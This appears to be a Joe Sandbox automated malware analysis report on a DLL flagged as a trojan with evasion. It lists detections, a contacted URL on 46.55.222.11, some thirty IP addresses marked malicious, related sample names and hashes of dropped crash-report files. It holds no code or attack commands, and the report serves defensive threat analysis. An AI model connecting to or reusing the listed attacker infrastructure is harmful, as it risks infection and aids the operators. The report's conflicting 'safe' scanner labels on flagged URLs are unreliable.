                      1.0.loaddll32.exe.930000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      6.2.rundll32.exe.570000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.f42468.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.12d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://46.55.222.11/UKKmNexCiEZNdWysJnUxJeBGVUutatZ0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://46.55.222.11/UKKmNexCiEZNdWysJnUxJeBGVUutat0%Avira URL Cloudsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://46.55.222.11/4%VirustotalBrowse
                      https://46.55.222.11/0%Avira URL Cloudsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://46.55.222.11/UKKmNexCiEZNdWysJnUxJeBGVUutattrue
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://46.55.222.11/UKKmNexCiEZNdWysJnUxJeBGVUutatZrundll32.exe, 00000019.00000002.815886128.000000000110A000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001B.00000003.688588185.0000023EE657F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.688701923.0000023EE65D0000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.ver)svchost.exe, 0000001B.00000002.713879734.0000023EE5CEF000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001B.00000003.688588185.0000023EE657F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.688701923.0000023EE65D0000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://upx.sf.netAmcache.hve.19.drfalse
                        high
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001B.00000003.694452575.0000023EE658F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.694431854.0000023EE65A6000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.694469243.0000023EE6A02000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.694398444.0000023EE65A6000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://help.disneyplus.com.svchost.exe, 0000001B.00000003.688588185.0000023EE657F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.688701923.0000023EE65D0000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://46.55.222.11/rundll32.exe, 00000019.00000002.816002840.000000000115E000.00000004.00000001.sdmpfalse
                        • 4%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://disneyplus.com/legal.svchost.exe, 0000001B.00000003.688588185.0000023EE657F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.688701923.0000023EE65D0000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        195.154.133.20
                        unknownFrance
                        12876OnlineSASFRtrue
                        212.237.17.99
                        unknownItaly
                        31034ARUBA-ASNITtrue
                        110.232.117.186
                        unknownAustralia
                        56038RACKCORP-APRackCorpAUtrue
                        104.245.52.73
                        unknownUnited States
                        63251METRO-WIRELESSUStrue
                        138.185.72.26
                        unknownBrazil
                        264343EmpasoftLtdaMeBRtrue
                        81.0.236.90
                        unknownCzech Republic
                        15685CASABLANCA-ASInternetCollocationProviderCZtrue
                        45.118.115.99
                        unknownIndonesia
                        131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                        103.75.201.2
                        unknownThailand
                        133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                        216.158.226.206
                        unknownUnited States
                        19318IS-AS-1UStrue
                        107.182.225.142
                        unknownUnited States
                        32780HOSTINGSERVICES-INCUStrue
                        45.118.135.203
                        unknownJapan63949LINODE-APLinodeLLCUStrue
                        50.116.54.215
                        unknownUnited States
                        63949LINODE-APLinodeLLCUStrue
                        51.68.175.8
                        unknownFrance
                        16276OVHFRtrue
                        103.8.26.102
                        unknownMalaysia
                        132241SKSATECH1-MYSKSATECHNOLOGYSDNBHDMYtrue
                        46.55.222.11
                        unknownBulgaria
                        34841BALCHIKNETBGtrue
                        41.76.108.46
                        unknownSouth Africa
                        327979DIAMATRIXZAtrue
                        103.8.26.103
                        unknownMalaysia
                        132241SKSATECH1-MYSKSATECHNOLOGYSDNBHDMYtrue
                        178.79.147.66
                        unknownUnited Kingdom
                        63949LINODE-APLinodeLLCUStrue
                        212.237.5.209
                        unknownItaly
                        31034ARUBA-ASNITtrue
                        176.104.106.96
                        unknownSerbia
                        198371NINETRStrue
                        207.38.84.195
                        unknownUnited States
                        30083AS-30083-GO-DADDY-COM-LLCUStrue
                        212.237.56.116
                        unknownItaly
                        31034ARUBA-ASNITtrue
                        45.142.114.231
                        unknownGermany
                        44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                        203.114.109.124
                        unknownThailand
                        131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                        210.57.217.132
                        unknownIndonesia
                        38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                        58.227.42.236
                        unknownKorea Republic of
                        9318SKB-ASSKBroadbandCoLtdKRtrue
                        185.184.25.237
                        unknownTurkey
                        209711MUVHOSTTRtrue
                        158.69.222.101
                        unknownCanada
                        16276OVHFRtrue
                        104.251.214.46
                        unknownUnited States
                        54540INCERO-HVVCUStrue

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:532048
                        Start date:01.12.2021
                        Start time:17:14:16
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 12m 38s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:2gyA5uNl6VPQUA.dll
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:32
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal88.troj.evad.winDLL@37/14@0/29
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 9.8% (good quality ratio 9.4%)
                        • Quality average: 72.9%
                        • Quality standard deviation: 24.2%
                        HCA Information:
                        • Successful, ratio: 84%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .dll
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 40.91.112.76, 20.54.110.249
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        17:18:19API Interceptor7x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        195.154.133.209sQccNfqAR.dllGet hashmaliciousBrowse
                          FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                            9sQccNfqAR.dllGet hashmaliciousBrowse
                              t3XtgyQEoe.dllGet hashmaliciousBrowse
                                t3XtgyQEoe.dllGet hashmaliciousBrowse
                                  SCAN_35292280954166786.xlsmGet hashmaliciousBrowse
                                    U4pi8WRxNJ.dllGet hashmaliciousBrowse
                                      oERkAQeB4d.dllGet hashmaliciousBrowse
                                        FC9fpZrma1.dllGet hashmaliciousBrowse
                                          Z4HpRSQD6I.dllGet hashmaliciousBrowse
                                            uLCt7sc5se.dllGet hashmaliciousBrowse
                                              rGF1Xgw9Il.dllGet hashmaliciousBrowse
                                                nBtjFS1D08.dllGet hashmaliciousBrowse
                                                  q8HPR8Yypk.dllGet hashmaliciousBrowse
                                                    mZuFa05xCp.dllGet hashmaliciousBrowse
                                                      TEm3oBxeXS.dllGet hashmaliciousBrowse
                                                        ma9Kq24IDH.dllGet hashmaliciousBrowse
                                                          U8GZ7uVALA.dllGet hashmaliciousBrowse
                                                            nq136LQEds.dllGet hashmaliciousBrowse
                                                              D1m935bghX.dllGet hashmaliciousBrowse
                                                                212.237.17.999sQccNfqAR.dllGet hashmaliciousBrowse
                                                                  FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                                                    9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                      t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                        t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                          SCAN_35292280954166786.xlsmGet hashmaliciousBrowse
                                                                            U4pi8WRxNJ.dllGet hashmaliciousBrowse
                                                                              oERkAQeB4d.dllGet hashmaliciousBrowse
                                                                                FC9fpZrma1.dllGet hashmaliciousBrowse
                                                                                  Z4HpRSQD6I.dllGet hashmaliciousBrowse
                                                                                    uLCt7sc5se.dllGet hashmaliciousBrowse
                                                                                      rGF1Xgw9Il.dllGet hashmaliciousBrowse
                                                                                        nBtjFS1D08.dllGet hashmaliciousBrowse
                                                                                          q8HPR8Yypk.dllGet hashmaliciousBrowse
                                                                                            mZuFa05xCp.dllGet hashmaliciousBrowse
                                                                                              TEm3oBxeXS.dllGet hashmaliciousBrowse
                                                                                                ma9Kq24IDH.dllGet hashmaliciousBrowse
                                                                                                  U8GZ7uVALA.dllGet hashmaliciousBrowse
                                                                                                    nq136LQEds.dllGet hashmaliciousBrowse
                                                                                                      D1m935bghX.dllGet hashmaliciousBrowse

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASN

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        ARUBA-ASNIT9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        QUOTATION FORM.exeGet hashmaliciousBrowse
                                                                                                        • 62.149.128.45
                                                                                                        MA4UA3e5xeGet hashmaliciousBrowse
                                                                                                        • 46.37.10.252
                                                                                                        SCAN_35292280954166786.xlsmGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        seL794VuEmGet hashmaliciousBrowse
                                                                                                        • 31.14.139.79
                                                                                                        b6GJG5t0kgGet hashmaliciousBrowse
                                                                                                        • 31.14.139.51
                                                                                                        U4pi8WRxNJ.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        oERkAQeB4d.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        FC9fpZrma1.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        Z4HpRSQD6I.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        uLCt7sc5se.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        rGF1Xgw9Il.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        nBtjFS1D08.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        q8HPR8Yypk.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        mZuFa05xCp.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        TEm3oBxeXS.dllGet hashmaliciousBrowse
                                                                                                        • 212.237.56.116
                                                                                                        OnlineSASFRspZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.146.35
                                                                                                        spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.146.35
                                                                                                        AtlanticareINV25-67431254.htmGet hashmaliciousBrowse
                                                                                                        • 51.15.17.195
                                                                                                        9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.133.20
                                                                                                        FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                                                                                        • 195.154.133.20
                                                                                                        9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.133.20
                                                                                                        t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.133.20
                                                                                                        t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.133.20
                                                                                                        67MPsax8fd.exeGet hashmaliciousBrowse
                                                                                                        • 163.172.208.8
                                                                                                        Linux_x86Get hashmaliciousBrowse
                                                                                                        • 212.83.174.79
                                                                                                        184285013-044310-Factura pendiente (2).exeGet hashmaliciousBrowse
                                                                                                        • 212.83.130.20
                                                                                                        MTjXit7IJnGet hashmaliciousBrowse
                                                                                                        • 51.158.219.54
                                                                                                        SCAN_35292280954166786.xlsmGet hashmaliciousBrowse
                                                                                                        • 195.154.133.20
                                                                                                        gvtdsqavfej.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.146.35
                                                                                                        mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.146.35
                                                                                                        dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.146.35
                                                                                                        jSxIzXfwc7.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.146.35
                                                                                                        mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.146.35
                                                                                                        X2XCewI2Yy.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.146.35
                                                                                                        dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                        • 195.154.146.35

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        51c64c77e60f3980eea90869b68c58a8spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        fehiVK2JSx.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        kQ9HU0gKVH.exeGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        gvtdsqavfej.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        jSxIzXfwc7.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        X2XCewI2Yy.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        HMvjzUYq2h.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        s9BZBDWmi4.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        bFx5bZRC6P.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        c7IUEh66u6.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        HMvjzUYq2h.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        s9BZBDWmi4.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        bFx5bZRC6P.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11
                                                                                                        WfCt2B042X.dllGet hashmaliciousBrowse
                                                                                                        • 46.55.222.11

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_f49b738aac9d445c211ec1cdbddf7abb15fde6_d70d8aa6_11633778\Report.wer
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.6756505752882381
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x8ogZqyzy9hko97JfEpXIQcQ6c6ucEccw3yh+a+z+HbHg0VG4rmMOyWZAXGng5Fs:iBvHkqmcjgq/u7sjS274ItW
                                                                                                        MD5:E83A379E3F886DDE0737C94E50929972
                                                                                                        SHA1:DA440B10630A1447F76F6C2862518D9160FDCEAD
                                                                                                        SHA-256:A74B68A5207DE2A571DEB46A8BB4D2697847550544A48C245EBAF1143003FEFE
                                                                                                        SHA-512:8EFEA6B3D174472C8EB15EDE4ADCBC333B36B537D61A6FEB90F88FFA66EFD4CE3C0321B33B2156EF0B0EC320D54FA8897E09FC5651C54F5000363E9AEF5F08CD
                                                                                                        Malicious:false
                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.8.1.4.5.1.0.7.3.1.1.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.e.3.1.4.6.3.-.a.8.4.c.-.4.7.c.1.-.9.c.4.e.-.4.d.b.7.b.3.f.f.a.a.b.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.1.5.1.2.1.0.-.d.3.6.c.-.4.b.7.f.-.a.0.3.f.-.9.9.5.6.1.c.7.7.e.f.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.e.8.-.0.0.0.1.-.0.0.1.c.-.2.8.e.8.-.6.5.0.d.1.a.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER222B.tmp.dmp
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 01:17:32 2021, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1060568
                                                                                                        Entropy (8bit):1.3778018531387082
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:jSFSLgVhMP5ZPkxMDrxjXiCnz26fOpOSEirIGM21V:jS4ui5ZPkQdXiCSBV
                                                                                                        MD5:670CEBD327DDCA577AC879415816A643
                                                                                                        SHA1:766C3E525ACD73736895C152C4625F3BC7374358
                                                                                                        SHA-256:E8684DD3A530CE34589F57A65BC112B6731FD48CC1D0AEB3C460F6DFC042C1F2
                                                                                                        SHA-512:03A911D656DC523F4B0DC7498226BE5489FF5684D2C4DA413A372E1BB7F5FBF630AB2F6463F0AB70265B6B037FC8CABE32FBD37D877E2F2D0DEBC20ECF5FAE08
                                                                                                        Malicious:false
                                                                                                        Preview: MDMP....... ..........a............4...............H.......$...........................`.......8...........T...........0....!...........................................................................................U...........B......p.......GenuineIntelW...........T..............a-............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D57.tmp.WERInternalMetadata.xml
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8342
                                                                                                        Entropy (8bit):3.698469333487002
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Rrl7r3GLNiWJ6Jo6YFGSU/Osgmf7SkCpBM89biOsf+Wm:RrlsNiI6W6YkSUmsgmf7SXiNfm
                                                                                                        MD5:E2B2081F14B077D36894F2FBFE2DE9A1
                                                                                                        SHA1:8D9897122DBA59B590D5C6EB3C68FEAA19125CAD
                                                                                                        SHA-256:21255234A624CE66D5028E8CF5A3F7DBBA484C3B317D25479E38A5ADCA916DB8
                                                                                                        SHA-512:970B7AE1A213F77A617A5F7480C3FE48E4CAC8AFE9C35E12CA529112A744FB6BACE669B6A30515349490574331E928A55A0000A332EDBCD13B0B85D22995A262
                                                                                                        Malicious:false
                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.7.6.<./.P.i.d.>.......
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3017.tmp.xml
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4598
                                                                                                        Entropy (8bit):4.475615349739502
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwSD8zsyJgtWI9NRWSC8BN8fm8M4J2yeFV+q845o3KcQIcQwQ2d:uITfAqASNoJ0S3KkwQ2d
                                                                                                        MD5:77292526940A2CED31107FF887CF478D
                                                                                                        SHA1:5A5EF4621DB426B1C1AAA50CCB671D827939DB6C
                                                                                                        SHA-256:0E439CD01CFB1E0C2F8A007628584A04407C49A280EB46342061B64E9CA89142
                                                                                                        SHA-512:A59669399730711B37F82E8676237DCA0C94CA645785A6701814F444DB8D9912112B0F760D1406A31685E4D361605E46B6F4E546C9AA162A796BA106155919F1
                                                                                                        Malicious:false
                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279348" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6A5.tmp.csv
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):52334
                                                                                                        Entropy (8bit):3.0557498672298893
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:cBH00vOY/i64EJ0Xxaztxa/rGwK6eF1c+j8:cBH00vOY/i64EJ0XxaztxMrGwK6eF1cb
                                                                                                        MD5:8FEF32FC113E0BCF8D366D66F16EC790
                                                                                                        SHA1:37A22ADB628537B727D8539FCCB33C85C214DFB8
                                                                                                        SHA-256:1D95DBAE0901FF25A3D05638B69A7512E3CAD0D307184455AEBBC20C1C48C3BD
                                                                                                        SHA-512:76CD26FD51F58B05E0D16A3EED2D9BA654F0FFBEE32D4DB73B427AA2347C0CD3B6616D74DABB5968D4F5DDAA80A37BEF9A326E57399BB1253989168A6EA50B89
                                                                                                        Malicious:false
